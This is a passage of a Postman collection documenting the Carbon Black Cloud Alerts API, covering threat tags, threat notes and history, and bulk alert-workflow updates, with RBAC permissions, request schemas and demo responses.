id=\"rbac-permissions-required\">RBAC Permissions Required</h3>\n<div class=\"click-to-expand-wrapper is-table-wrapper\"><table>\n<thead>\n<tr>\n<th>Permission (.notation name)</th>\n<th>Operation(s)</th>\n</tr>\n</thead>\n<tbody>\n<tr>\n<td>org.alerts.tags</td>\n<td>CREATE</td>\n</tr>\n</tbody>\n</table>\n</div><p><a href=\"https://developer.carbonblack.com/reference/carbon-black-cloud/platform/latest/alerts-api\">See Documentation</a></p>\n","auth":{"type":"apikey","apikey":{"basicConfig":[{"key":"key","value":"X-Auth-Token"},{"key":"value","value":"{{cb_custom_key}}/{{cb_custom_id}}"}]},"isInherited":true,"source":{"_postman_id":"ac866782-e63b-44f3-8fec-94cd4fb9d7a1","id":"ac866782-e63b-44f3-8fec-94cd4fb9d7a1","name":"Carbon Black Cloud (CBC)","type":"folder"}},"urlObject":{"path":["api","alerts","v7","orgs","{{cb_org_key}}","threats","{{cb_threat_id}}","tags"],"host":["{{cb_url}}"],"query":[],"variable":[]}},"response":[{"id":"a13927d2-e2bd-4f5c-9a4f-2b34e466eb69","name":"Add Tag","originalRequest":{"method":"POST","header":[{"key":"Content-Type","value":"application/json"},{"key":"Accept","value":"application/json"}],"body":{"mode":"raw","raw":"{\n  \"tags\": [\n    \"DemoTag01\",\n    \"DemoTag02\"\n  ]\n}","options":{"raw":{"headerFamily":"json","language":"json"}}},"url":"{{cb_url}}/api/alerts/v7/orgs/{{cb_org_key}}/threats/{{cb_threat_id}}/tags"},"status":"OK","code":200,"_postman_previewlanguage":"json","header":[{"key":"Date","value":"Tue, 25 Apr 2023 20:50:21 GMT"},{"key":"Content-Type","value":"application/json"},{"key":"Content-Length","value":"45"},{"key":"Connection","value":"keep-alive"},{"key":"Cache-Control","value":"no-cache, no-store, max-age=0, must-revalidate"},{"key":"Expires","value":"0"},{"key":"Pragma","value":"no-cache"},{"key":"X-Content-Type-Options","value":"nosniff"},{"key":"X-Frame-Options","value":"DENY"},{"key":"X-Xss-Protection","value":"1; mode=block"}],"cookie":[],"responseTime":null,"body":"{\n    \"tags\": [\n        \"DemoTag01\",\n        \"DemoTag02\"\n    ]\n}"}],"_postman_id":"6be9e864-b58d-4dbf-8f76-d6a790b5973d"},{"name":"Delete a Tag","id":"29622418-53a6-4650-856a-3285513a6b67","protocolProfileBehavior":{"disableBodyPruning":true},"request":{"method":"DELETE","header":[{"key":"Accept","value":"application/json"}],"url":"{{cb_url}}/api/alerts/v7/orgs/{{cb_org_key}}/threats/{{cb_threat_id}}/tags/{{cb_tag}}","description":"<p>Remove a tag from the specified Threat.</p>\n<p>The response includes remaining tags on the Threat.</p>\n<h3 id=\"rbac-permissions-required\">RBAC Permissions Required</h3>\n<div class=\"click-to-expand-wrapper is-table-wrapper\"><table>\n<thead>\n<tr>\n<th>Permission (.notation name)</th>\n<th>Operation(s)</th>\n</tr>\n</thead>\n<tbody>\n<tr>\n<td>org.alerts.tags</td>\n<td>DELETE</td>\n</tr>\n</tbody>\n</table>\n</div><p><a href=\"https://developer.carbonblack.com/reference/carbon-black-cloud/platform/latest/alerts-api\">See Documentation</a></p>\n","auth":{"type":"apikey","apikey":{"basicConfig":[{"key":"key","value":"X-Auth-Token"},{"key":"value","value":"{{cb_custom_key}}/{{cb_custom_id}}"}]},"isInherited":true,"source":{"_postman_id":"ac866782-e63b-44f3-8fec-94cd4fb9d7a1","id":"ac866782-e63b-44f3-8fec-94cd4fb9d7a1","name":"Carbon Black Cloud (CBC)","type":"folder"}},"urlObject":{"path":["api","alerts","v7","orgs","{{cb_org_key}}","threats","{{cb_threat_id}}","tags","{{cb_tag}}"],"host":["{{cb_url}}"],"query":[],"variable":[]}},"response":[{"id":"6052ed45-8489-4554-896c-b8955680385a","name":"Delete a Tag","originalRequest":{"method":"DELETE","header":[{"key":"Accept","value":"application/json"}],"url":"{{cb_url}}/api/alerts/v7/orgs/{{cb_org_key}}/threats/{{cb_threat_id}}/tags/DemoTag01"},"status":"OK","code":200,"_postman_previewlanguage":"json","header":[{"key":"Date","value":"Tue, 25 Apr 2023 22:17:52 GMT"},{"key":"Content-Type","value":"application/json"},{"key":"Content-Length","value":"33"},{"key":"Connection","value":"keep-alive"},{"key":"Cache-Control","value":"no-cache, no-store, max-age=0, must-revalidate"},{"key":"Expires","value":"0"},{"key":"Pragma","value":"no-cache"},{"key":"X-Content-Type-Options","value":"nosniff"},{"key":"X-Frame-Options","value":"DENY"},{"key":"X-Xss-Protection","value":"1; mode=block"}],"cookie":[],"responseTime":null,"body":"{\n    \"tags\": [\n        \"DemoTag02\"\n    ]\n}"}],"_postman_id":"29622418-53a6-4650-856a-3285513a6b67"}],"id":"5a1726e8-c822-4304-ae56-c7784e578533","description":"<p>Tags can be added to Threats to provide additional information.</p>\n","_postman_id":"5a1726e8-c822-4304-ae56-c7784e578533","auth":{"type":"apikey","apikey":{"basicConfig":[{"key":"key","value":"X-Auth-Token"},{"key":"value","value":"{{cb_custom_key}}/{{cb_custom_id}}"}]},"isInherited":true,"source":{"_postman_id":"ac866782-e63b-44f3-8fec-94cd4fb9d7a1","id":"ac866782-e63b-44f3-8fec-94cd4fb9d7a1","name":"Carbon Black Cloud (CBC)","type":"folder"}}},{"name":"Threats","item":[{"name":"Get History of a Threat ID","id":"263dab38-2fe5-4a3a-b37e-17d8e1f7f6f6","protocolProfileBehavior":{"disableBodyPruning":true},"request":{"method":"GET","header":[{"key":"Accept","value":"*/*"}],"url":"{{cb_url}}/api/alerts/v7/orgs/{{cb_org_key}}/threats/{{cb_threat_id}}/history","description":"<p>Get the history, including notes, of a threat.</p>\n<h3 id=\"rbac-permissions-required\">RBAC Permissions Required</h3>\n<div class=\"click-to-expand-wrapper is-table-wrapper\"><table>\n<thead>\n<tr>\n<th>Permission (.notation name)</th>\n<th>Operation(s)</th>\n</tr>\n</thead>\n<tbody>\n<tr>\n<td>org.alerts.notes</td>\n<td>READ</td>\n</tr>\n</tbody>\n</table>\n</div><p><a href=\"https://developer.carbonblack.com/reference/carbon-black-cloud/platform/latest/alerts-api\">See Documentation</a></p>\n<h3 id=\"response-schema\">Response Schema</h3>\n<pre class=\"click-to-expand-wrapper is-snippet-wrapper\"><code class=\"language-json\">{\n  \"history\": [\n    {\n      \"type\": \"MDR_WORKFLOW_UPDATE\",\n      \"note\": {\n        \"author\": \"&lt;string&gt;\",\n        \"create_timestamp\": \"&lt;dateTime&gt;\",\n        \"last_update_timestamp\": \"&lt;dateTime&gt;\",\n        \"id\": \"&lt;string&gt;\",\n        \"source\": \"Suppression\",\n        \"note\": \"&lt;string&gt;\",\n        \"parent_id\": \"&lt;string&gt;\",\n        \"read_history\": {\n          \"amet_3ae\": \"&lt;dateTime&gt;\",\n          \"ex_0_7\": \"&lt;dateTime&gt;\"\n        }\n      },\n      \"workflow\": {\n        \"change_timestamp\": \"&lt;dateTime&gt;\"\n      },\n      \"determination\": {\n        \"change_timestamp\": \"&lt;dateTime&gt;\"\n      }\n    },\n    {\n      \"type\": \"MDR_WORKFLOW_UPDATE\",\n      \"note\": {\n        \"author\": \"&lt;string&gt;\",\n        \"create_timestamp\": \"&lt;dateTime&gt;\",\n        \"last_update_timestamp\": \"&lt;dateTime&gt;\",\n        \"id\": \"&lt;string&gt;\",\n        \"source\": \"Customer\",\n        \"note\": \"&lt;string&gt;\",\n        \"parent_id\": \"&lt;string&gt;\",\n        \"read_history\": {\n          \"id04\": \"&lt;dateTime&gt;\",\n          \"Ut_c\": \"&lt;dateTime&gt;\"\n        }\n      },\n      \"workflow\": {\n        \"change_timestamp\": \"&lt;dateTime&gt;\"\n      },\n      \"determination\": {\n        \"change_timestamp\": \"&lt;dateTime&gt;\"\n      }\n    }\n  ]\n}\n\n</code></pre>\n","auth":{"type":"apikey","apikey":{"basicConfig":[{"key":"key","value":"X-Auth-Token"},{"key":"value","value":"{{cb_custom_key}}/{{cb_custom_id}}"}]},"isInherited":true,"source":{"_postman_id":"ac866782-e63b-44f3-8fec-94cd4fb9d7a1","id":"ac866782-e63b-44f3-8fec-94cd4fb9d7a1","name":"Carbon Black Cloud (CBC)","type":"folder"}},"urlObject":{"path":["api","alerts","v7","orgs","{{cb_org_key}}","threats","{{cb_threat_id}}","history"],"host":["{{cb_url}}"],"query":[],"variable":[]}},"response":[{"id":"10311d7e-8313-4af5-b062-4effbd754c44","name":"Get this history of a threat ID","originalRequest":{"method":"GET","header":[{"key":"Accept","value":"*/*"}],"url":"{{cb_url}}/api/alerts/v7/orgs/{{cb_org_key}}/threats/{{cb_threat_id}}/history"},"status":"OK","code":200,"_postman_previewlanguage":"json","header":[{"key":"Date","value":"Tue, 18 Apr 2023 03:21:27 GMT"},{"key":"Content-Type","value":"application/json"},{"key":"Content-Length","value":"229"},{"key":"Connection","value":"keep-alive"},{"key":"Cache-Control","value":"no-cache, no-store, max-age=0, must-revalidate"},{"key":"Content-Encoding","value":"br"},{"key":"Expires","value":"0"},{"key":"Pragma","value":"no-cache"},{"key":"Set-Cookie","value":"JSESSIONID=7878E179A4FB5FFA220ECEE72DC45273; Path=/api/alerts; Secure; HttpOnly"},{"key":"Vary","value":"Accept-Encoding"},{"key":"X-Content-Type-Options","value":"nosniff"},{"key":"X-Frame-Options","value":"DENY"},{"key":"X-Xss-Protection","value":"1; mode=block"}],"cookie":[],"responseTime":null,"body":"{\n    \"history\": [\n        {\n            \"type\": \"THREAT_NOTE_ADDED\",\n            \"note\": {\n                \"author\": \"demouser@demoorg.com\",\n                \"create_timestamp\": \"2023-04-18T03:20:59.426Z\",\n                \"last_update_timestamp\": \"2023-04-18T03:20:59.426Z\",\n                \"id\": \"372ab282-7733-48fd-b26c-d58508b8c88f\",\n                \"source\": \"CUSTOMER\",\n                \"note\": \"A note on the threat\",\n                \"parent_id\": null,\n                \"read_history\": null,\n                \"thread\": null\n            }\n        }\n    ]\n}"}],"_postman_id":"263dab38-2fe5-4a3a-b37e-17d8e1f7f6f6"},{"name":"Get notes for a threat","id":"a682f60a-b130-41a8-b1d1-ed8817f5f555","protocolProfileBehavior":{"disableBodyPruning":true},"request":{"method":"GET","header":[{"key":"Accept","value":"application/json"}],"url":"{{cb_url}}/api/alerts/v7/orgs/{{cb_org_key}}/threats/{{cb_threat_id}}/notes?sort_field=create_timestamp&sort_order=ASC","description":"<p>Get the notes associated with a threat.</p>\n<h3 id=\"rbac-permissions-required\">RBAC Permissions Required</h3>\n<div class=\"click-to-expand-wrapper is-table-wrapper\"><table>\n<thead>\n<tr>\n<th>Permission (.notation name)</th>\n<th>Operation(s)</th>\n</tr>\n</thead>\n<tbody>\n<tr>\n<td>org.alerts.notes</td>\n<td>READ</td>\n</tr>\n</tbody>\n</table>\n</div><p><a href=\"https://developer.carbonblack.com/reference/carbon-black-cloud/platform/latest/alerts-api\">See Documentation</a></p>\n","auth":{"type":"apikey","apikey":{"basicConfig":[{"key":"key","value":"X-Auth-Token"},{"key":"value","value":"{{cb_custom_key}}/{{cb_custom_id}}"}]},"isInherited":true,"source":{"_postman_id":"ac866782-e63b-44f3-8fec-94cd4fb9d7a1","id":"ac866782-e63b-44f3-8fec-94cd4fb9d7a1","name":"Carbon Black Cloud (CBC)","type":"folder"}},"urlObject":{"path":["api","alerts","v7","orgs","{{cb_org_key}}","threats","{{cb_threat_id}}","notes"],"host":["{{cb_url}}"],"query":[{"description":{"content":"<p>The field to sort the notes by</p>\n","type":"text/plain"},"key":"sort_field","value":"create_timestamp"},{"description":{"content":"<p>Whether to sort the fields ascending (ASC) or descending (DESC)</p>\n","type":"text/plain"},"key":"sort_order","value":"ASC"}],"variable":[]}},"response":[{"id":"ef073d31-0b37-4f29-a31e-c7827c7a4455","name":"Get notes for a threat","originalRequest":{"method":"GET","header":[{"key":"Accept","value":"application/json"}],"url":{"raw":"{{cb_url}}/api/alerts/v7/orgs/{{cb_org_key}}/threats/{{cb_threat_id}}/notes?sort_field=create_timestamp&sort_order=DESC","host":["{{cb_url}}"],"path":["api","alerts","v7","orgs","{{cb_org_key}}","threats","{{cb_threat_id}}","notes"],"query":[{"key":"sort_field","value":"create_timestamp","description":"The field to sort the notes by"},{"key":"sort_order","value":"DESC","description":"Whether to sort the fields ascending (ASC) or descending (DESC)"}]}},"status":"OK","code":200,"_postman_previewlanguage":"json","header":[{"key":"Date","value":"Tue, 18 Apr 2023 03:28:42 GMT"},{"key":"Content-Type","value":"application/json"},{"key":"Content-Length","value":"350"},{"key":"Connection","value":"keep-alive"},{"key":"Cache-Control","value":"no-cache, no-store, max-age=0, must-revalidate"},{"key":"Content-Encoding","value":"br"},{"key":"Expires","value":"0"},{"key":"Pragma","value":"no-cache"},{"key":"Set-Cookie","value":"JSESSIONID=4C1186B7E4675E7D2FB365FF60BB6B38; Path=/api/alerts; Secure; HttpOnly"},{"key":"Vary","value":"Accept-Encoding"},{"key":"X-Content-Type-Options","value":"nosniff"},{"key":"X-Frame-Options","value":"DENY"},{"key":"X-Xss-Protection","value":"1; mode=block"}],"cookie":[],"responseTime":null,"body":"{\n    \"num_found\": 2,\n    \"num_available\": 2,\n    \"results\": [\n        {\n            \"author\": \"demouser@demoorg.com\",\n            \"create_timestamp\": \"2023-04-18T03:30:55.408Z\",\n            \"last_update_timestamp\": \"2023-04-18T03:30:55.408Z\",\n            \"id\": \"21471599-f528-4ecf-b4cf-85db9811e5f1\",\n            \"source\": \"CUSTOMER\",\n            \"note\": \"A second note to test sorting\"\n        },\n        {\n            \"author\": \"demouser@demoorg.com\",\n            \"create_timestamp\": \"2023-04-18T03:25:44.397Z\",\n            \"last_update_timestamp\": \"2023-04-18T03:25:44.397Z\",\n            \"id\": \"321e5c6a-d55e-4687-82a3-769a34d1adef\",\n            \"source\": \"CUSTOMER\",\n            \"note\": \"My first note\"\n        }\n    ]\n}"}],"_postman_id":"a682f60a-b130-41a8-b1d1-ed8817f5f555"},{"name":"Create a threat-level note","id":"af0a8b20-2796-42ff-9134-6c4e7a90ed21","protocolProfileBehavior":{"disableBodyPruning":true},"request":{"method":"POST","header":[{"key":"Content-Type","value":"application/json"},{"key":"Accept","value":"application/json"}],"body":{"mode":"raw","raw":"{\n  \"note\": \"A note from the API\"\n}","options":{"raw":{"headerFamily":"json","language":"json"}}},"url":"{{cb_url}}/api/alerts/v7/orgs/{{cb_org_key}}/threats/{{cb_threat_id}}/notes","description":"<p>Create a note associated with a threat.</p>\n<h3 id=\"rbac-permissions-required\">RBAC Permissions Required</h3>\n<div class=\"click-to-expand-wrapper is-table-wrapper\"><table>\n<thead>\n<tr>\n<th>Permission (.notation name)</th>\n<th>Operation(s)</th>\n</tr>\n</thead>\n<tbody>\n<tr>\n<td>org.alerts.notes</td>\n<td>CREATE</td>\n</tr>\n</tbody>\n</table>\n</div><p><a href=\"https://developer.carbonblack.com/reference/carbon-black-cloud/platform/latest/alerts-api\">See Documentation</a></p>\n<h3 id=\"request-schema\">Request Schema</h3>\n<pre class=\"click-to-expand-wrapper is-snippet-wrapper\"><code class=\"language-json\">{\n  \"note\": \"&lt;string&gt;\",\n  \"parent_id\": \"&lt;string&gt;\"\n}\n\n</code></pre>\n","auth":{"type":"apikey","apikey":{"basicConfig":[{"key":"key","value":"X-Auth-Token"},{"key":"value","value":"{{cb_custom_key}}/{{cb_custom_id}}"}]},"isInherited":true,"source":{"_postman_id":"ac866782-e63b-44f3-8fec-94cd4fb9d7a1","id":"ac866782-e63b-44f3-8fec-94cd4fb9d7a1","name":"Carbon Black Cloud (CBC)","type":"folder"}},"urlObject":{"path":["api","alerts","v7","orgs","{{cb_org_key}}","threats","{{cb_threat_id}}","notes"],"host":["{{cb_url}}"],"query":[],"variable":[]}},"response":[{"id":"9bc97f28-8d1c-4402-aa4d-76f4c2415804","name":"Create a threat-level note","originalRequest":{"method":"POST","header":[{"key":"Content-Type","value":"application/json"},{"key":"Accept","value":"application/json"}],"body":{"mode":"raw","raw":"{\n  \"note\": \"A note from the API\"\n}","options":{"raw":{"headerFamily":"json","language":"json"}}},"url":"{{cb_url}}/api/alerts/v7/orgs/{{cb_org_key}}/threats/{{cb_threat_id}}/notes"},"status":"Created","code":201,"_postman_previewlanguage":"json","header":[{"key":"Date","value":"Tue, 18 Apr 2023 03:35:25 GMT"},{"key":"Content-Type","value":"application/json"},{"key":"Content-Length","value":"264"},{"key":"Connection","value":"keep-alive"},{"key":"Cache-Control","value":"no-cache, no-store, max-age=0, must-revalidate"},{"key":"Expires","value":"0"},{"key":"Pragma","value":"no-cache"},{"key":"Set-Cookie","value":"JSESSIONID=8D4196946458892942E74B254B2F53CA; Path=/api/alerts; Secure; HttpOnly"},{"key":"X-Content-Type-Options","value":"nosniff"},{"key":"X-Frame-Options","value":"DENY"},{"key":"X-Xss-Protection","value":"1; mode=block"}],"cookie":[],"responseTime":null,"body":"{\n    \"author\": \"APIKEY1234\",\n    \"create_timestamp\": \"2023-04-18T03:35:24.962Z\",\n    \"last_update_timestamp\": \"2023-04-18T03:35:24.962Z\",\n    \"id\": \"b924a3fd-a077-42e9-bbe6-a811d23df61d\",\n    \"source\": \"CUSTOMER\",\n    \"note\": \"A note from the API\"\n}"}],"_postman_id":"af0a8b20-2796-42ff-9134-6c4e7a90ed21"},{"name":"Delete a threat-level note","id":"2318ba06-e145-4b52-a915-4658d39f54f2","protocolProfileBehavior":{"disableBodyPruning":true},"request":{"method":"DELETE","header":[{"key":"Accept","value":"*/*"}],"url":"{{cb_url}}/api/alerts/v7/orgs/{{cb_org_key}}/threats/{{cb_threat_id}}/notes/{{cb_threat_note_id}}","description":"<p>Delete a note associated with a threat.</p>\n<h3 id=\"rbac-permissions-required\">RBAC Permissions Required</h3>\n<div class=\"click-to-expand-wrapper is-table-wrapper\"><table>\n<thead>\n<tr>\n<th>Permission (.notation name)</th>\n<th>Operation(s)</th>\n</tr>\n</thead>\n<tbody>\n<tr>\n<td>org.alerts.notes</td>\n<td>DELETE</td>\n</tr>\n</tbody>\n</table>\n</div><p><a href=\"https://developer.carbonblack.com/reference/carbon-black-cloud/platform/latest/alerts-api\">See Documentation</a></p>\n","auth":{"type":"apikey","apikey":{"basicConfig":[{"key":"key","value":"X-Auth-Token"},{"key":"value","value":"{{cb_custom_key}}/{{cb_custom_id}}"}]},"isInherited":true,"source":{"_postman_id":"ac866782-e63b-44f3-8fec-94cd4fb9d7a1","id":"ac866782-e63b-44f3-8fec-94cd4fb9d7a1","name":"Carbon Black Cloud (CBC)","type":"folder"}},"urlObject":{"path":["api","alerts","v7","orgs","{{cb_org_key}}","threats","{{cb_threat_id}}","notes","{{cb_threat_note_id}}"],"host":["{{cb_url}}"],"query":[],"variable":[]}},"response":[{"id":"06c26995-4a83-4429-a400-369b087bbaf6","name":"Note deleted successfully","originalRequest":{"method":"DELETE","header":[],"url":"{{cb_url}}/v7/orgs/{{cb_org_key}}/threats/{{cb_threat_id}}/notes/{{cb_threat_note_id}}"},"status":"No Content","code":204,"_postman_previewlanguage":"text","header":[{"key":"Content-Type","value":"*/*"}],"cookie":[],"responseTime":null,"body":"{}"},{"id":"a0d51bf2-83ea-45d7-a121-e007edfe9dd7","name":"Note not found","originalRequest":{"method":"DELETE","header":[],"url":"{{cb_url}}/v7/orgs/{{cb_org_key}}/threats/{{cb_threat_id}}/notes/{{cb_threat_note_id}}"},"status":"Not Found","code":404,"_postman_previewlanguage":"json","header":[{"key":"Content-Type","value":"application/json","description":""}],"cookie":[],"responseTime":null,"body":"{\n    \"error_code\": \"NOT_FOUND\",\n    \"message\": \"Failed to find the notes : this-note-does-not-exist for orgKey: ABCD1234, threat id: 7103E507844087BE20351A50D8773029\",\n    \"org_key\": \"ABCD1234\",\n    \"resource_type\": \"Note\"\n}"}],"_postman_id":"2318ba06-e145-4b52-a915-4658d39f54f2"}],"id":"a2eb6388-6c48-4900-b99f-70b1234267fa","description":"<p>Alerts typically have a threat identified in their metadata. A threat is comprised of a combination of factors that can be repeated across devices. Composition of threat_id varies by alert type and is either a guid, md5, or sha256 hash.</p>\n","_postman_id":"a2eb6388-6c48-4900-b99f-70b1234267fa","auth":{"type":"apikey","apikey":{"basicConfig":[{"key":"key","value":"X-Auth-Token"},{"key":"value","value":"{{cb_custom_key}}/{{cb_custom_id}}"}]},"isInherited":true,"source":{"_postman_id":"ac866782-e63b-44f3-8fec-94cd4fb9d7a1","id":"ac866782-e63b-44f3-8fec-94cd4fb9d7a1","name":"Carbon Black Cloud (CBC)","type":"folder"}}},{"name":"Workflow","item":[{"name":"Bulk Update Alerts Workflow by Search Definition","id":"32ea4c8c-e9ac-4cc9-abdf-550381467f40","protocolProfileBehavior":{"disableBodyPruning":true},"request":{"method":"POST","header":[{"key":"Content-Type","value":"application/json"},{"key":"Accept","value":"application/json"}],"body":{"mode":"raw","raw":"{\n    \"criteria\": {\n        \"id\": [\n            \"{{cb_alert_id}}\"\n        ]\n    },\n    \"determination\": \"Choose one of NONE, TRUE_POSITIVE, FALSE_POSITIVE\",\n    \"closure_reason\": \"OTHER\",\n    \"status\": \"Choose one of OPEN, IN_PROGRESS, CLOSED\",\n    \"note\": \"Note about the determination\"\n}","options":{"raw":{"headerFamily":"json","language":"json"}}},"url":"{{cb_url}}/api/alerts/v7/orgs/{{cb_org_key}}/alerts/workflow","description":"<p>Use a search request to identify alerts on which to set the determination and other information.</p>\n<p>This is an async operation. Call the <a href=\"https://developer.carbonblack.com/reference/carbon-black-cloud/platform/latest/job-service-api/#get-job-details\">job details route</a> to check the progress of the operation.</p>\n<p>The sequence of calls is:</p>\n<ol>\n<li>Start the job with this call, bulk update of alerts</li>\n<li>The response contains a request_id</li>\n<li>Check the status of the job using the Get Job Details request with the request_id from step 2.</li>\n<li>When the status is complete, the action is complete on alerts that match the query, criteria and exclusions in the request.</li>\n</ol>\n<p><a href=\"https://developer.carbonblack.com/reference/carbon-black-cloud/platform/latest/alerts-api/#alert-search\">See Documentation</a></p>\n<h3 id=\"rbac-permissions-required\">RBAC Permissions Required</h3>\n<div class=\"click-to-expand-wrapper is-table-wrapper\"><table>\n<thead>\n<tr>\n<th>Permission (.notation name)</th>\n<th>Operation(s)</th>\n</tr>\n</thead>\n<tbody>\n<tr>\n<td>org.alerts.dismiss</td>\n<td>EXECUTE</td>\n</tr>\n<tr>\n<td>To get job status:  <br />job.status</td>\n<td><br />READ</td>\n</tr>\n</tbody>\n</table>\n</div><h3 id=\"request-schema\">Request Schema</h3>\n<pre class=\"click-to-expand-wrapper is-snippet-wrapper\"><code class=\"language-json\">{\n  \"query\": \"&lt;string&gt;\",\n  \"time_range\": {\n    \"start\": \"&lt;dateTime&gt;\",\n    \"end\": \"&lt;dateTime&gt;\",\n    \"range\": \"&lt;string&gt;\"\n  },\n  \"criteria\": {\n    \"org_key\": [\n      \"&lt;string&gt;\"\n    ],\n    \"id\": [\n      \"&lt;string&gt;\"\n    ],\n    \"type\": [\n      \"&lt;string&gt;\"\n    ],\n    \"backend_timestamp\": {\n      \"start\": \"&lt;dateTime&gt;\",\n      \"end\": \"&lt;dateTime&gt;\",\n      \"range\": \"&lt;string&gt;\"\n    },\n    \"user_update_timestamp\": {\n      \"start\": \"&lt;dateTime&gt;\",\n      \"end\": \"&lt;dateTime&gt;\",\n      \"range\": \"&lt;string&gt;\"\n    },\n    \"backend_update_timestamp\": {\n      \"start\": \"&lt;dateTime&gt;\",\n      \"end\": \"&lt;dateTime&gt;\",\n      \"range\": \"&lt;string&gt;\"\n    },\n    \"detection_timestamp\": {\n      \"start\": \"&lt;dateTime&gt;\",\n      \"end\": \"&lt;dateTime&gt;\",\n      \"range\": \"&lt;string&gt;\"\n    },\n    \"first_event_timestamp\": {\n      \"start\": \"&lt;dateTime&gt;\",\n      \"end\": \"&lt;dateTime&gt;\",\n      \"range\": \"&lt;string&gt;\"\n    },\n    \"last_event_timestamp\": {\n      \"start\": \"&lt;dateTime&gt;\",\n      \"end\": \"&lt;dateTime&gt;\",\n      \"range\": \"&lt;string&gt;\"\n    },\n    \"category\": [\n      \"&lt;string&gt;\"\n    ],\n    \"minimum_severity\": &lt;integer&gt;,\n    \"reason_code\": [\n      \"&lt;string&gt;\"\n    ],\n    \"threat_id\": [\n      \"&lt;string&gt;\"\n    ],\n    \"primary_event_id\": [\n      \"&lt;string&gt;\"\n    ],\n    \"policy_applied\": [\n      \"&lt;string&gt;\"\n    ],\n    \"run_state\": [\n      \"&lt;string&gt;\"\n    ],\n    \"sensor_action\": [\n      \"&lt;string&gt;\"\n    ],\n    \"workflow_status\": [\n      \"&lt;string&gt;\"\n    ],\n    \"workflow_change_timestamp\": {\n      \"start\": \"&lt;dateTime&gt;\",\n      \"end\": \"&lt;dateTime&gt;\",\n      \"range\": \"&lt;string&gt;\"\n    },\n    \"workflow_changed_by_type\": [\n      \"&lt;string&gt;\"\n    ],\n    \"workflow_changed_by_autoclose_rule_id\": [\n      \"&lt;string&gt;\"\n    ],\n    \"workflow_closure_reason\": [\n      \"&lt;string&gt;\"\n    ],\n    \"determination_value\": [\n      \"&lt;string&gt;\"\n    ],\n    \"determination_change_timestamp\": {\n      \"start\": \"&lt;dateTime&gt;\",\n      \"end\": \"&lt;dateTime&gt;\",\n      \"range\": \"&lt;string&gt;\"\n    },\n    \"determination_changed_by_type\": [\n      \"&lt;string&gt;\"\n    ],\n    \"tags\": [\n      \"&lt;string&gt;\"\n    ],\n    \"alert_notes_present\": &lt;boolean&gt;,\n    \"threat_notes_present\": &lt;boolean&gt;,\n    \"device_id\": [\n      &lt;long&gt;\n    ],\n    \"device_name\": [\n      \"&lt;string&gt;\"\n    ],\n    \"device_uem_id\": [\n      \"&lt;string&gt;\"\n    ],\n    \"device_policy\": [\n      \"&lt;string&gt;\"\n    ],\n    \"device_policy_id\": [\n      &lt;long&gt;\n    ],\n    \"device_target_value\": [\n      \"&lt;string&gt;\"\n    ],\n    \"device_os\": [\n      \"&lt;string&gt;\"\n    ],\n    \"device_os_version\": [\n      \"&lt;string&gt;\"\n    ],\n    \"device_username\": [\n      \"&lt;string&gt;\"\n    ],\n    \"device_location\": [\n      \"&lt;string&gt;\"\n    ],\n    \"device_external_ip\": [\n      \"&lt;string&gt;\"\n    ],\n    \"device_internal_ip\": [\n      \"&lt;string&gt;\"\n    ],\n    \"rule_config_type\": [\n      \"&lt;string&gt;\"\n    ],\n    \"rule_config_name\": [\n      \"&lt;string&gt;\"\n    ],\n    \"rule_config_id\": [\n      \"&lt;string&gt;\"\n    ],\n    \"rule_category_id\": [\n      \"&lt;string&gt;\"\n    ],\n    \"rule_id\": [\n      \"&lt;string&gt;\"\n    ],\n    \"process_guid\": [\n      \"&lt;string&gt;\"\n    ],\n    \"process_pid\": [\n      &lt;integer&gt;\n    ],\n    \"process_name\": [\n      \"&lt;string&gt;\"\n    ],\n    \"process_sha256\": [\n      \"&lt;string&gt;\"\n    ],\n    \"process_md5\": [\n      \"&lt;string&gt;\"\n    ],\n    \"process_effective_reputation\": [\n      \"&lt;string&gt;\"\n    ],\n    \"process_reputation\": [\n      \"&lt;string&gt;\"\n    ],\n    \"process_cmdline\": [\n      \"&lt;string&gt;\"\n    ],\n    \"process_username\": [\n      \"&lt;string&gt;\"\n    ],\n    \"process_signatures_certificate_authority\": [\n      \"&lt;string&gt;\"\n    ],\n    \"process_signatures_publisher\": [\n      \"&lt;string&gt;\"\n    ],\n    \"parent_guid\": [\n      \"&lt;string&gt;\"\n    ],\n    \"parent_pid\": [\n      &lt;integer&gt;\n    ],\n    \"parent_name\": [\n      \"&lt;string&gt;\"\n    ],\n    \"parent_sha256\": [\n      \"&lt;string&gt;\"\n    ],\n    \"parent_md5\": [\n      \"&lt;string&gt;\"\n    ],\n    \"parent_effective_reputation\": [\n      \"&lt;string&gt;\"\n    ],\n    \"parent_reputation\": [\n      \"ADWARE\",\n      \"NOT_SUPPORTED\"\n    ],\n    \"parent_cmdline\": [\n      \"&lt;string&gt;\"\n    ],\n    \"parent_username\": [\n      \"&lt;string&gt;\"\n    ],\n    \"childproc_guid\": [\n      \"&lt;string&gt;\"\n    ],\n    \"childproc_name\": [\n      \"&lt;string&gt;\"\n    ],\n    \"childproc_sha256\": [\n      \"&lt;string&gt;\"\n    ],\n    \"childproc_md5\": [\n      \"&lt;string&gt;\"\n    ],\n    \"childproc_effective_reputation\": [\n      \"&lt;string&gt;\"\n    ],\n    \"childproc_username\": [\n      \"&lt;string&gt;\"\n    ],\n    \"childproc_cmdline\": [\n      \"&lt;string&gt;\"\n    ],\n    \"netconn_remote_port\": [\n      &lt;integer&gt;\n    ],\n    \"netconn_local_port\": [\n      &lt;integer&gt;\n    ],\n    \"netconn_protocol\": [\n      \"&lt;string&gt;\"\n    ],\n    \"netconn_remote_domain\": [\n      \"&lt;string&gt;\"\n    ],\n    \"netconn_remote_ip\": [\n      \"&lt;string&gt;\"\n    ],\n    \"netconn_local_ip\": [\n      \"&lt;string&gt;\"\n    ],\n    \"netconn_remote_ipv4\": [\n      \"&lt;string&gt;\"\n    ],\n    \"netconn_local_ipv4\": [\n      \"&lt;string&gt;\"\n    ],\n    \"netconn_remote_ipv6\": [\n      \"&lt;string&gt;\"\n    ],\n    \"netconn_local_ipv6\": [\n      \"&lt;string&gt;\"\n    ],\n    \"threat_category\": [\n      \"&lt;string&gt;\"\n    ],\n    \"ttps\": [\n      \"&lt;string&gt;\"\n    ],\n    \"attack_tactic\": [\n      \"&lt;string&gt;\"\n    ],\n    \"attack_technique\": [\n      \"&lt;string&gt;\"\n    ],\n    \"report_id\": [\n      \"&lt;string&gt;\"\n    ],\n    \"report_name\": [\n      \"&lt;string&gt;\"\n    ],\n    \"report_link\": [\n      \"&lt;string&gt;\"\n    ],\n    \"watchlists_id\": [\n      \"&lt;string&gt;\"\n    ],\n    \"watchlists_name\": [\n      